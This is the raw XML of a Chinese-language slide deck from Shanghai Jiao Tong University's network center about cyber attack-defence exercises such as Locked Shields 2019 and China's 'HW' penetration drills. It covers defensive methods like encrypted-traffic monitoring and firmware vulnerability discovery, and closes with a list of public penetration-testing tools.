              <a:rPr lang="zh-CN" altLang="en-US" sz="2100" dirty="0" smtClean="0"/>
              <a:t>滥用、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2100" dirty="0" smtClean="0"/>
              <a:t>Tor</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2100" dirty="0" smtClean="0"/>
              <a:t>通信</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="21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通用防护方法及挑战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392425" y="985520"/>
            <a:ext cx="8372163" cy="3017520"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="97500"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2500" dirty="0" smtClean="0"/>
              <a:t>加密流量监测</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="25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基于人工智能与大数据技术，检测高</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>隐蔽性的恶意加密流</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="18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多</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0"/>
              <a:t>个维</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0" smtClean="0"/>
              <a:t>度融合</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0"/>
              <a:t>、深度关联流量数据及其</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0" smtClean="0"/>
              <a:t>元数据</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="16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运用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0"/>
              <a:t>机器学习</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0" smtClean="0"/>
              <a:t>方法</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0"/>
              <a:t>检测</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0" smtClean="0"/>
              <a:t>多维</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0"/>
              <a:t>度下流量信息分布的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0" smtClean="0"/>
              <a:t>差别</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="16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构造</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0"/>
              <a:t>高</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0" smtClean="0"/>
              <a:t>层级、细粒度的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0"/>
              <a:t>异常检测模型</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0" smtClean="0"/>
              <a:t>（数据包</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0"/>
              <a:t>的先后顺序、时间、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0" smtClean="0"/>
              <a:t>长度）</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="16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实现</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0"/>
              <a:t>对异常流量的高阶</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0" smtClean="0"/>
              <a:t>判定</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="16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1800" dirty="0" smtClean="0"/>
              <a:t>CISCO ETA</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>、观成科技、极客信安</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2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通用防护方法及挑战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4" y="3578314"/>
            <a:ext cx="5977895" cy="32002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43600" y="591312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hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>https://www.aqniu.com/tools-tech/45207.html</a:t>
            </a:r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2932770"/>
            <a:ext cx="3454400" cy="1291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392425" y="985520"/>
            <a:ext cx="8372163" cy="5669280"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="97500"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2500" dirty="0"/>
              <a:t>漏洞挖掘</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="25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针对攻击的根本问题，先</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>于</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>攻击者发现未公开漏洞</a:t>
            </a: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挑战：</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="3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脱离真实设备，基于固件分析</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="3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静态分析为主，动态模拟验证</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="2" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="18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18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以物联网设备为主，兼顾工控级设备</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="3">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>物</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>联网设备：针对公开协议（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" smtClean="0"/>
              <a:t>WEB\UPnP\DNS\MQTT</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>），污点分析结合符号执行，灰盒测试为主</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="3">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="3">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>工</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>控协议：协议未知，遵从简单的功能码</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>模型，比较单一、无复杂交互，协议逆向依赖捕获正常通信数据包，黑盒测试为主</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="18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我们</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>的解决方案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8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b="1" dirty="0" smtClean="0"/>
              <a:t>Locked </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0"/>
              <a:t>Shields 2019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北约</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>卓越协同网络防卫中心</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" smtClean="0"/>
              <a:t>CCD COE)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场景：</a:t>
            </a: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以红</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>蓝对抗的形式守护虚拟国家</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" err="1" smtClean="0"/>
              <a:t>Berylia</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="20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/>
              <a:t>发电与配电设施、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>4G</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>通信系统、海上监视系统、污水处理厂和其他关键基础设施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规则：</a:t>
            </a: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2000" dirty="0"/>
              <a:t>23</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>个</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>国家组成的蓝队：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" err="1" smtClean="0"/>
              <a:t>Berylia</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>的国家</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>快速响应</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>小组</a:t>
            </a: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维护</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" smtClean="0"/>
              <a:t>4000 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>多个虚拟系统抵御多达</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" smtClean="0"/>
              <a:t>2500</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>次攻击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/>
              <a:t>目标：</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="20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在</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>重压下维持各种系统的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>运转</a:t>
            </a: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帮助</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>提升理解战略和策略层面决策影响的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>能力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2000" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>https://ccdcoe.org/exercises/locked-shields/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" smtClean="0"/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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>演习</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>概况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攻防演习概况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背景介绍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国内外重大攻防</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN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演习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marL="228600" lvl="1">
              <a:spcBef>
                <a:spcPts val="670"/>
              </a:spcBef>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0" smtClean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marL="228600" lvl="1">
              <a:spcBef>
                <a:spcPts val="670"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN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攻防</a:t>
            </a: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关键</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN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技术</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US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攻击路径及关键技术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典型攻防案例解析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通用</a:t>
            </a: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防护方法</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN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及</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" alt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挑战</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg2">
                  <a:lumMod val="40000"/>
                  <a:lumOff val="60000"/>
                </a:schemeClr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marL="228600" lvl="1">
              <a:spcBef>
                <a:spcPts val="670"/>
              </a:spcBef>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="3200" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="004098"/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  <a:p>
            <a:pPr marL="228600" lvl="1">
              <a:spcBef>
                <a:spcPts val="670"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="004098"/>
                </a:solidFill>
                <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:ea typeface="SimHei" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>总结</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="3200" dirty="0">
              <a:solidFill>
                <a:srgbClr val="004098"/>
              </a:solidFill>
              <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              <a:ea typeface="SimHei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7500"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="u"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2500" dirty="0" smtClean="0"/>
              <a:t>概括性介绍了国内外攻防演习</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="25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5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sz="2500" dirty="0" smtClean="0"/>
              <a:t>针对性了解攻防演习关键技术</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="25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全面解析攻方的攻击路径</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="21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1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高危安全漏洞演示与原理剖析</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2100" dirty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1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解析经典“后渗透”测试案例</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2100" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="ü"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="25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sz="2500" dirty="0"/>
              <a:t>通用防护方法所面临的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2500" dirty="0" smtClean="0"/>
              <a:t>挑战与应对</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="25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用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2100" dirty="0"/>
              <a:t>新技术解决新</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2100" dirty="0" smtClean="0"/>
              <a:t>问题</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="21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100" dirty="0" smtClean="0"/>
              <a:t>我们的解决方案</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="21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4098"/>
                </a:solidFill>
                <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>总结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软件漏洞测试开源平台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Metasploit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github.com/rapid7/metasploit-framework</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>针对嵌入式设备的开源渗透框架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github.com/threat9/routersploit</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>涵盖主流渗透测试工具集的发行系统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4"/>
              </a:rPr>
              <a:t>https://www.kali.org/</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>安全入门书籍</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>《</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>Metasploit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>渗透测试魔鬼训练营</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>》</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1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://book.douban.com/subject/25723796/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推荐工具列表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906296"/>
      </p:ext>
    </p:extLst>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition spd="med"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066794"/>
            <a:ext cx="9144000" cy="926932"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4800" b="0" i="1" dirty="0">
                <a:latin typeface="+mj-ea"/>
              </a:rPr>
              <a:t>谢 谢 ！</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="4800" i="1" dirty="0">
              <a:latin typeface="+mn-ea"/>
              <a:ea typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="副标题 4"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1925873" y="5288681"/>
            <a:ext cx="5820358" cy="1452116"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr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ea typeface="KaiTi" panose="02010609060101010101" pitchFamily="49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zh-CN" sz="1800" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              <a:ea typeface="KaiTi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</a:rPr>
              <a:t>                                        上海</a:t>
            </a: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</a:rPr>
              <a:t>交通大学网络信息中心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t="879" r="270" b="1118"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="2208715"/>
            <a:ext cx="9144000" cy="2775643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66" y="5083621"/>
            <a:ext cx="1657176" cy="1657176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b="1" dirty="0"/>
              <a:t>Locked Shields 2019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特点：</a:t>
            </a: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zh-CN" sz="2000" dirty="0"/>
              <a:t>IT</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>系统和军事相关系统的复杂性都上升到了新的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>高度</a:t>
            </a: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在大型</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>复杂</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>IT</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>环境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检测并缓解</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>攻击</a:t>
            </a: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如何保护</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>不熟悉的专业</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>系统（如大量的工控系统）</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="20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运行在爱沙尼亚国防军</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>管理的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>Cyber Range</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>平台上</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="3">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>演习</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>概况</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1026" name="Picture 2" descr="https://ccdcoe.org/uploads/2019/04/LS19_110419_54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55" y="3603836"/>
            <a:ext cx="4717085" cy="306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342611" y="5053801"/>
            <a:ext cx="178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配电系统</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>中加入的真实发电</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>组件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b="1" dirty="0" smtClean="0"/>
              <a:t>“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0" smtClean="0"/>
              <a:t>HW</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>”行动</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" b="1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dirty="0"/>
              <a:t>大型渗透测试</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>行动：由</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>官方主导，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>在特定时间段，由各个安全厂商和安全团队参与的，针对中央部委、大型国企、科研院所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b="1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b="1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特点：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>完全真实环境下的攻防演练，防御方一般会事先整改网络，关闭不必要的服务，缩小攻击面</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2000" b="1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b="1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b="1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作用：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>实际检测各个重要国家部委、企业等机构网络的安防现状，提升了安全防御水平</a:t>
            </a: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攻防</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>演习</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>概况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3">
      <a:majorFont>
        <a:latin typeface="等线"/>
        <a:ea typeface="黑体"/>
        <a:cs typeface=""/>
      </a:majorFont>
      <a:minorFont>
        <a:latin typeface="Times New Roman"/>
        <a:ea typeface="华文中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SJTU3</Template>
  <TotalTime>234</TotalTime>
  <Words>5489</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>全屏显示(4:3)</PresentationFormat>
  <Paragraphs>791</Paragraphs>
  <Slides>73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9" baseType="lpstr">
      <vt:lpstr>FangSong</vt:lpstr>
      <vt:lpstr>KaiTi</vt:lpstr>
      <vt:lpstr>等线</vt:lpstr>
      <vt:lpstr>黑体</vt:lpstr>
      <vt:lpstr>黑体</vt:lpstr>
      <vt:lpstr>华文中宋</vt:lpstr>
      <vt:lpstr>SimSun</vt:lpstr>
      <vt:lpstr>SimSun</vt:lpstr>
      <vt:lpstr>Microsoft YaHei</vt:lpstr>
      <vt:lpstr>Arial</vt:lpstr>
      <vt:lpstr>Calibri</vt:lpstr>
      <vt:lpstr>Tahoma</vt:lpstr>
      <vt:lpstr>Times</vt:lpstr>
      <vt:lpstr>Times New Roman</vt:lpstr>
      <vt:lpstr>Wingdings</vt:lpstr>
      <vt:lpstr>2016-VI主题-蓝</vt:lpstr>
      <vt:lpstr>网络安全攻防演习漫谈</vt:lpstr>
      <vt:lpstr>About Me</vt:lpstr>
      <vt:lpstr>Outline</vt:lpstr>
      <vt:lpstr>攻防演习概况</vt:lpstr>
      <vt:lpstr>攻防演习概况</vt:lpstr>
      <vt:lpstr>攻防演习概况</vt:lpstr>
      <vt:lpstr>攻防演习概况</vt:lpstr>
      <vt:lpstr>攻防演习概况</vt:lpstr>
      <vt:lpstr>攻防演习概况</vt:lpstr>
      <vt:lpstr>攻防演习概况</vt:lpstr>
      <vt:lpstr>Outline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攻防关键技术</vt:lpstr>
      <vt:lpstr>通用防护方法及挑战</vt:lpstr>
      <vt:lpstr>通用防护方法及挑战</vt:lpstr>
      <vt:lpstr>通用防护方法及挑战</vt:lpstr>
      <vt:lpstr>通用防护方法及挑战</vt:lpstr>
      <vt:lpstr>我们的解决方案</vt:lpstr>
      <vt:lpstr>Outline</vt:lpstr>
      <vt:lpstr>总结</vt:lpstr>
      <vt:lpstr>推荐工具列表</vt:lpstr>
      <vt:lpstr>谢 谢 ！</vt:lpstr>
    </vt:vector>
  </TitlesOfParts>
  <Company>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无线网建设七期</dc:title>
  <dc:creator>me</dc:creator>
  <cp:lastModifiedBy>wang leon</cp:lastModifiedBy>
  <cp:revision>574</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2018-09-14T03:27:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2020-04-21T11:19:32Z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